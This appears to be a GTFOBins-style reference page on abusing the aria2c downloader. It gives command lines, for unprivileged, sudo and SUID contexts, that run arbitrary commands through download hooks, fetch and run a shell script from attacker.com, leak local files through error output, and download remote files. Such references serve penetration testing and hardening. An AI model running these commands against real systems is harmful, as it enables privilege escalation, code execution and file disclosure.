.. / aria2c

Sponsor

Fork

Star

Sponsor

Fork

Star

• Command
• File read
• Download

Command

This executable can run non-interactive system commands.

• Comment

  Note that the subprocess is immediately sent to the background.

  Unprivileged

  This function can be performed by any unprivileged user.

  echo /path/to/command >/path/to/temp-file
  chmod +x /path/to/temp-file
  aria2c --on-download-error=/path/to/temp-file http://some-invalid-domain

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  echo /path/to/command >/path/to/temp-file
  chmod +x /path/to/temp-file
  aria2c --on-download-error=/path/to/temp-file http://some-invalid-domain

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  Remarks

  This executable runs commands using the system shell, e.g., via functions like system, so it only works for distributions where the shell does not drop SUID privileges.

  echo /path/to/command >/path/to/temp-file
  chmod +x /path/to/temp-file
  aria2c --on-download-error=/path/to/temp-file http://some-invalid-domain

• Comment

  The remote file aaaaaaaaaaaaaaaa (must be a string of 16 hex digit) contains the shell script, e.g., /path/to/command. Note that said file needs to be written on disk in order to be executed. --allow-overwrite is needed if this is executed multiple times with the same GID.

  Unprivileged

  This function can be performed by any unprivileged user.

  aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=/bin/sh http://attacker.com/aaaaaaaaaaaaaaaa

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=/bin/sh http://attacker.com/aaaaaaaaaaaaaaaa

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  Remarks

  This executable runs commands using the system shell, e.g., via functions like system, so it only works for distributions where the shell does not drop SUID privileges.

  aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=/bin/sh http://attacker.com/aaaaaaaaaaaaaaaa

File read

This executable can read data from local files.

• Comment

  The file is leaked as error messages.

  Unprivileged

  This function can be performed by any unprivileged user.

  aria2c -i /path/to/input-file

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  aria2c -i /path/to/input-file

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  aria2c -i /path/to/input-file

  Remarks

  The content is corrupted or otherwise altered by the process, thus it might not be suitable for handling arbitrary binary data.

Download

This executable can download remote data.

• Comment

  Use --allow-overwrite if needed. Similarly -o /path/to/ouput-file can be omitted, in that case the file is saved to input-file in the current working directory.

  Unprivileged

  This function can be performed by any unprivileged user.

  aria2c -o /path/to/ouput-file http://attacker.com/path/to/input-file

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  aria2c -o /path/to/ouput-file http://attacker.com/path/to/input-file

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  aria2c -o /path/to/ouput-file http://attacker.com/path/to/input-file

Source | History